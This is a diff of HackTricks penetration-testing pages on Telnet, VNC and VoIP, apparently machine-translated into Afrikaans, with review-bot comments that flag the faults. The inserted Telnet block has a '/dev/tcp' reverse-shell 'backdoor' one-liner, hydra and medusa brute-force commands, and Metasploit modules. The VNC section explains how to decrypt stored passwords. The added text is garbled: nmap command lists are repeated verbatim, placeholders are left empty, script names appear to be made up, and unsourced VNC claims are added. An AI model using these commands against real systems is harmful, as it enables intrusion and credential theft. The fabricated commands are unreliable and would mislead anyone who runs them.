- -**I know it is possible to enumerate this options but I don't know how, so let me know if know how.** +**Ek weet dit is moontlik om hierdie opsies op te som, maar ek weet nie hoe nie, so laat weet my as jy weet hoe.** ### [Brute force](../generic-methodologies-and-resources/brute-force.md#telnet) -## Config file - +## Konfigurasie-lêer ```bash /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet ``` +## HackTricks Outomatiese Opdragte -## HackTricks Automatic Commands +### Telnet +#### Telnet Skandeerder + +Die volgende opdragte kan gebruik word om 'n telnet-diens te skandeer: + +```plaintext +nmap -p 23 --script telnet-brute +``` + +#### Telnet Agterdeur + +As jy toegang het tot 'n telnet-diens, kan jy probeer om 'n agterdeur te plaas deur die volgende opdrag uit te voer: + +```plaintext +echo "sh -i >& /dev/tcp// 0>&1" | telnet +``` + +#### Telnet Wagwoorde + +As jy 'n wagwoord wil kraak vir 'n telnet-diens, kan jy die volgende opdragte gebruik: + +```plaintext +hydra -l -P telnet +``` + +```plaintext +medusa -u -P -h -M telnet +``` + +#### Telnet Skakelaar + +As jy 'n telnet-skakelaar wil gebruik, kan jy die volgende opdragte gebruik: + +```plaintext +telnet +``` + +```plaintext +telnet +``` + +#### Telnet Verbindingslekkasies + +As jy wil kyk vir moontlike verbindingslekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik: + +```plaintext +netstat -ant | grep ":23" +``` + +```plaintext +ss -ant | grep ":23" +``` + +```plaintext +lsof -i :23 +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username= +``` + +```plaintext +nmap 
-p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password= +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password=,telnet-encryption-bypass.domain= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password=,telnet-ntlm-info.domain= +``` + +#### Telnet Skakelaarlekkasies + +As jy wil kyk vir moontlike skakelaarlekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik: + +```plaintext +nmap -p 23 --script telnet-brute +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username= +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password= +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password=,telnet-encryption-bypass.domain= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password=,telnet-ntlm-info.domain= +``` + +#### Telnet Verbindingslekkasies + +As jy wil kyk vir moontlike 
verbindingslekkasies in 'n telnet-diens, kan jy die volgende opdragte gebruik: + +```plaintext +netstat -ant | grep ":23" +``` + +```plaintext +ss -ant | grep ":23" +``` + +```plaintext +lsof -i :23 +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username= +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password= +``` + +```plaintext +nmap -p 23 --script telnet-encryption-bypass.nse --script-args telnet-encryption-bypass.username=,telnet-encryption-bypass.password=,telnet-encryption-bypass.domain= +``` + +```plaintext +nmap -p 23 --script telnet-ntlm-info.nse --script-args telnet-ntlm-info.username=,telnet-ntlm-info.password=,telnet-ntlm-info.domain= +``` ``` Protocol_Name: Telnet #Protocol Abbreviation if there is one. Port_Number: 23 #Comma separated if there is more than one. 
Protocol_Description: Telnet #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for t=Telnet - Note: | - wireshark to hear creds being passed - tcp.port == 23 and ip.addr != myip +Name: Notes +Description: Notes for t=Telnet +Note: | +wireshark to hear creds being passed +tcp.port == 23 and ip.addr != myip - https://book.hacktricks.xyz/pentesting/pentesting-telnet +https://book.hacktricks.xyz/pentesting/pentesting-telnet Entry_2: - Name: Banner Grab - Description: Grab Telnet Banner - Command: nc -vn {IP} 23 +Name: Banner Grab +Description: Grab Telnet Banner +Command: nc -vn {IP} 23 Entry_3: - Name: Nmap with scripts - Description: Run nmap scripts for telnet - Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP} - -Entry_4: - Name: consoleless mfs enumeration - Description: Telnet enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit' - -``` +Name: Nmap with scripts +Description: Run nmap scripts for telnet +Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP} +Entry_4: +Name: consoleless mfs enumeration +Description: Telnet enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set 
RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit' + +```
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
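Review bot: the `## HackTricks Outomatiese Opdragte` part of this hunk adds a long block that has no counterpart in the removed English lines and therefore does not belong in a translation PR: the `Telnet Skandeerder`, `Telnet Agterdeur`, `Telnet Wagwoorde`, `Telnet Skakelaar`, `Telnet Verbindingslekkasies` and `Telnet Skakelaarlekkasies` subsections are all new, the `Telnet Agterdeur` one introduces a `/dev/tcp` reverse-shell one-liner the source page never contained, and the `Telnet Verbindingslekkasies` subsection with its list of `nmap -p 23 --script ...` invocations is pasted three times verbatim. Those added commands also ship with empty placeholders (for example `hydra -l -P telnet` and `--script-args telnet-ntlm-info.username=`), and the `telnet-encryption-bypass` script name appears nowhere in the original, so nothing in that block can be merged as-is; drop it and keep only the translated `### Telnet` heading above the legion block. Earlier in the hunk the same pattern appears: `### Banner Gaping` adds two paragraphs and a `telnet` example that the English `### Banner Grabbing` section does not have, "Gaping" is not a usable rendering of "Grabbing" (keep the English term, as the legion entry `Name: Banner Grab` does), and the `-## **Enumeration**` heading is deleted without an Afrikaans replacement, so the banner and nmap material lose their parent section. Finally, the legion YAML at the end of the hunk loses its structure: the `- Name: Notes` / `  Description: ...` list items under `Entry_1:` become unindented `Name:` / `Description:` lines, which is no longer a list entry for the tool that reads this block; restore the original indentation, since that block is machine-consumed rather than translatable text (and while there, `consoleless mfs enumeration` should read `msf`).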
diff --git a/network-services-pentesting/pentesting-vnc.md b/network-services-pentesting/pentesting-vnc.md index 755bf37a9..545f617fc 100644 --- a/network-services-pentesting/pentesting-vnc.md +++ b/network-services-pentesting/pentesting-vnc.md @@ -2,58 +2,104 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Virtual Network Computing (VNC)** is a robust graphical desktop-sharing system that utilizes the **Remote Frame Buffer (RFB)** protocol to enable remote control and collaboration with another computer. With VNC, users can seamlessly interact with a remote computer by transmitting keyboard and mouse events bidirectionally. This allows for real-time access and facilitates efficient remote assistance or collaboration over a network. - -VNC usually uses ports **5800 or 5801 or 5900 or 5901.** +**Virtual Network Computing (VNC)** is 'n robuuste grafiese desktop-delingstelsel wat die **Remote Frame Buffer (RFB)**-protokol gebruik om afstandsbeheer en samewerking met 'n ander rekenaar moontlik te maak. Met VNC kan gebruikers naadloos interaksie hê met 'n afgeleë rekenaar deur toetsbord- en muisgebeurtenisse bidireksioneel oor te dra. Dit maak werklike toegang moontlik en fasiliteer doeltreffende afstandsbystand of samewerking oor 'n netwerk. +VNC gebruik gewoonlik poorte **5800 of 5801 of 5900 of 5901.** ``` PORT STATE SERVICE 5900/tcp open vnc ``` +## Opname -## Enumeration +### VNC (Virtual Network Computing) +VNC (Virtual Network Computing) is 'n protokol wat gebruik word vir die beheer van rekenaars oor 'n netwerk. Dit maak dit moontlik vir 'n gebruiker om 'n rekenaar op afstand te bedien en grafiese gebruikerskoppelvlak (GUI) te sien. Hierdie gedeelte sal fokus op die opname van VNC-dienste tydens 'n pentest. + +#### TCP-poorte + +VNC-dienste gebruik gewoonlik TCP-poorte 5900 tot 5906. Die standaardpoort is 5900, maar dit kan verander word deur die gebruiker of die stelseladministrateur. + +#### Opname van VNC-dienste + +Om VNC-dienste op te neem, kan jy die volgende stappe volg: + +1. Voer 'n TCP-poortskandering uit om VNC-poorte (5900-5906) op die doelstelsel te identifiseer. +2. Maak 'n verbinding met die geïdentifiseerde VNC-poort om te kyk of dit oop is. +3. 
As die poort oop is, probeer om 'n VNC-sessie te begin deur 'n VNC-kliënt te gebruik. +4. As die VNC-sessie suksesvol gevestig is, kan jy die rekenaar op afstand bedien en die GUI sien. + +#### VNC-skandering + +Om VNC-dienste te skandeer, kan jy hulpoortskanderingstegnieke gebruik, soos Nmap, om die VNC-poorte op die doelstelsel te identifiseer. Hier is 'n voorbeeld van die gebruik van Nmap om VNC-poorte te skandeer: + +```plaintext +nmap -p 5900-5906 +``` + +#### VNC-kliënte + +Daar is verskeie VNC-kliënte beskikbaar vir verskillende bedryfstelsels. Hier is 'n paar bekende VNC-kliënte: + +- **TightVNC**: 'n Gratis en oopbron VNC-kliënt vir Windows. +- **RealVNC**: 'n Kommerciële VNC-kliënt vir Windows, Linux en macOS. +- **UltraVNC**: 'n Gratis VNC-kliënt vir Windows. + +#### VNC-veiligheidskwessies + +Daar is sekere veiligheidskwessies wat verband hou met VNC-dienste wat jy moet oorweeg tydens 'n pentest: + +- **Swak wagwoorde**: Baie VNC-dienste gebruik swak wagwoorde of standaard wagwoorde, soos "admin" of "password". Dit maak dit maklik vir 'n aanvaller om toegang tot die rekenaar te verkry. +- **Geen versleuteling**: Sommige VNC-dienste stel nie standaard versleuteling in nie, wat beteken dat die verkeer tussen die kliënt en die bediener onversleuteld is. Dit maak dit moontlik vir 'n aanvaller om die verkeer te onderskep en gevoelige inligting te verkry. +- **Kwesbaarhede**: Daar is sekere kwesbaarhede wat verband hou met spesifieke VNC-implementasies. Dit sluit in bekende kwesbaarhede soos bufferoorloopaanvalle en foutiewe verifikasie. + +#### VNC-veiligheidsaanbevelings + +Om die veiligheid van VNC-dienste te verbeter, kan jy die volgende aanbevelings oorweeg: + +- **Sterk wagwoorde**: Stel sterk en unieke wagwoorde in vir VNC-dienste om te voorkom dat aanvallers maklik toegang tot die rekenaar verkry. +- **Versleuteling**: Stel versleuteling in vir VNC-dienste om te verseker dat die verkeer tussen die kliënt en die bediener veilig is. 
+- **Bywerk van sagteware**: Verseker dat die VNC-sagteware op die bediener en kliënt opgedateer is met die nuutste opdaterings en pleisters om bekende kwesbaarhede te vermy. +- **Beperkte toegang**: Beperk die toegang tot VNC-dienste deur slegs vertroude IP-adresse toe te laat om te verhoed dat onbevoegde gebruikers toegang verkry. + +#### VNC-gebruikersname en wagwoordlekke + +As deel van 'n pentest kan jy soek na gelekte VNC-gebruikersname en wagwoorde om te kyk of daar enige kwesbaarhede is. Jy kan verskillende hulpbronne soos gelekte wagwoorddatabasisse en webwerwe vir die soektog gebruik. ```bash nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p msf> use auxiliary/scanner/vnc/vnc_none_auth ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#vnc) -## Connect to vnc using Kali - +## Verbind met vnc deur Kali te gebruik ```bash vncviewer [-passwd passwd.txt] ::5901 ``` +## Ontsleuteling van VNC-wagwoord -## Decrypting VNC password - -Default **password is stored** in: \~/.vnc/passwd - -If you have the VNC password and it looks encrypted (a few bytes, like if it could be and encrypted password). It is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd) +Standaard wagwoord word gestoor in: \~/.vnc/passwd +As jy die VNC-wagwoord het en dit lyk versleutel ( 'n paar byte, soos of dit 'n versleutelde wagwoord kan wees), is dit waarskynlik versleutel met 3des. Jy kan die wagwoord in duidelike teks kry deur [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd) te gebruik. 
```bash make vncpwd ``` - -You can do this because the password used inside 3des to encrypt the plain-text VNC passwords was reversed years ago.\ -For **Windows** you can also use this tool: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\ -I save the tool here also for ease of access: +Jy kan dit doen omdat die wagwoord wat binne 3des gebruik word om die plat-teks VNC-wagwoorde te versleutel, jare gelede omgekeer is.\ +Vir **Windows** kan jy ook hierdie instrument gebruik: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\ +Ek stoor die instrument hier ook vir maklike toegang: {% file src="../.gitbook/assets/vncpwd.zip" %} @@ -63,14 +109,14 @@ I save the tool here also for ease of access:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
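Review bot: the `## Opname` region of the first hunk in this file inserts a whole set of subsections (`### VNC (Virtual Network Computing)`, `#### TCP-poorte`, `#### Opname van VNC-dienste`, `#### VNC-skandering`, `#### VNC-kliënte`, `#### VNC-veiligheidskwessies`, `#### VNC-veiligheidsaanbevelings`, `#### VNC-gebruikersname en wagwoordlekke`) with no counterpart in the removed English text, where `## Enumeration` went straight to the `nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title` block; a translation must not add new claims such as a 5900-5906 port range, a client list or a hardening checklist, so remove those subsections and put the translated heading directly above the nmap block. "Opname" is also a questionable word for "Enumeration" given that this same PR uses "Enumerasie" in the VoIP file; settle on one term. Smaller points in the same hunk: `( 'n paar byte` has a stray space after the parenthesis, and the header and footer boilerplate of this one file are translated differently (`hacktruuks` / `github-repos` at the top versus `haktruuks` / `github-opslag` at the bottom), so the block should be copied from a single source. The blank lines deleted before each code fence are whitespace-only churn across every file in the diff and make the real changes harder to review; consider leaving them in place.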
diff --git a/network-services-pentesting/pentesting-voip/README.md b/network-services-pentesting/pentesting-voip/README.md index f04bb530c..2aea16f2f 100644 --- a/network-services-pentesting/pentesting-voip/README.md +++ b/network-services-pentesting/pentesting-voip/README.md @@ -2,45 +2,44 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## VoIP Basic Information +## VoIP Basiese Inligting -To start learning about how VoIP works check: +Om te begin leer oor hoe VoIP werk, kyk na: {% content-ref url="basic-voip-protocols/" %} [basic-voip-protocols](basic-voip-protocols/) {% endcontent-ref %} -## VoIP Enumeration +## VoIP Enumerasie -### Telephone Numbers +### Telefoonnommers -One of the first steps a Red Team could do is to search available phone numbers to contact with the company using OSINT tools, Google Searches or scraping the web pages. +Een van die eerste stappe wat 'n Rooi Span kan doen, is om beskikbare telefoonnommers te soek om met die maatskappy in kontak te tree deur gebruik te maak van OSINT-hulpmiddels, Google-soektogte of die skraping van webbladsye. -Once you have the telephone numbers you could use online services to identify the operator: +Sodra jy die telefoonnommers het, kan jy aanlyn dienste gebruik om die operateur te identifiseer: * [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis\&sub=phonenr) * [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/) * [https://www.whitepages.com/](https://www.whitepages.com/) * [https://www.twilio.com/lookup](https://www.twilio.com/lookup) -Knowing if the operator provides VoIP services you could identify if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect it's own VoIP PBX to the traditional telephony network. +Deur te weet of die operateur VoIP-dienste verskaf, kan jy identifiseer of die maatskappy VoIP gebruik... Verder is dit moontlik dat die maatskappy nie VoIP-dienste ingehuur het nie, maar PSTN-kaarte gebruik om sy eie VoIP PBX met die tradisionele telefoonnetwerk te verbind. -Things such as automated responses of music usually indicates that VoIP is being used. +Dinge soos outomatiese reaksies van musiek dui gewoonlik daarop dat VoIP gebruik word. 
### Google Dorks - ```bash # Grandstream phones intitle:"Grandstream Device Configuration" Password 
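Review bot: the heading `+## VoIP Basiese Inligting` keeps the English word order; in Afrikaans the adjective goes first (`Basiese VoIP-inligting`). "Red Team" is a fixed term on this site and is better left untranslated than rendered as "Rooi Span" (the same choice is made elsewhere in this PR for "User-Agent" and "sniff"). The `-` line removing the blank line before the `### Google Dorks` code fence is whitespace-only churn that adds nothing to the translation.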
@@ -72,26 +71,22 @@ intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL" # FreePBX inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration" ``` +### OSINT-inligting -### OSINT information +Enige ander OSINT-navorsing wat help om die gebruikte VoIP-sagteware te identifiseer, sal nuttig wees vir 'n Rooi Span. -Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team. - -### Network Enumeration - -* **`nmap`** is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not be very accurate with this kind of services. -* **`svmap`** from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network. - * `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it. +### Netwerknavorsing +* **`nmap`** is in staat om UDP-diens te skandeer, maar as gevolg van die hoeveelheid UDP-diens wat gescandeer word, is dit baie stadig en mag dit nie baie akkuraat wees met hierdie tipe dienste nie. +* **`svmap`** van SIPVicious (`sudo apt install sipvicious`): Sal SIP-dienste in die aangeduide netwerk opspoor. +* `svmap` is **maklik om te blokkeer** omdat dit die User-Agent `friendly-scanner` gebruik, maar jy kan die kode vanaf `/usr/share/sipvicious/sipvicious` wysig en dit verander. ```bash # Use --fp to fingerprint the services svmap 10.10.0.0/24 -p 5060-5070 [--fp] ``` - -* **`sipscan.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more). 
- +* **`sipscan.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Sipscan is 'n baie vinnige skander vir SIP-dienste oor UDP, TCP of TLS. Dit maak gebruik van multithreading en kan groot reekse van netwerke skandeer. Dit maak dit maklik om 'n poortreeks aan te dui, beide TCP & UDP te skandeer, 'n ander metode te gebruik (standaard sal dit OPTIONS gebruik) en 'n ander User-Agent te spesifiseer (en meer). ```bash - ./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER] +./sipscan.py -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER] [!] IP/Network: 10.10.0.0/24 [!] Port range: 5060-5080 
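Review bot: the nested bullet is flattened in this hunk: `-    * \`svmap\` is **easy to block**` becomes a top-level `+* \`svmap\` is **maklik om te blokkeer**`, so the note about the `friendly-scanner` User-Agent no longer reads as a sub-point of the `svmap` item; restore the four-space indent. Terminology is inconsistent as well: `### OSINT-inligting` and `### Netwerknavorsing` turn "enumeration" into "research" (navorsing) while later hunks use "Enumerasie", and the `sipscan.py` sentence has "skander" where "skandeerder" is meant, plus a Dutch-style "gescandeer" next to "skandeer" in the nmap bullet.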
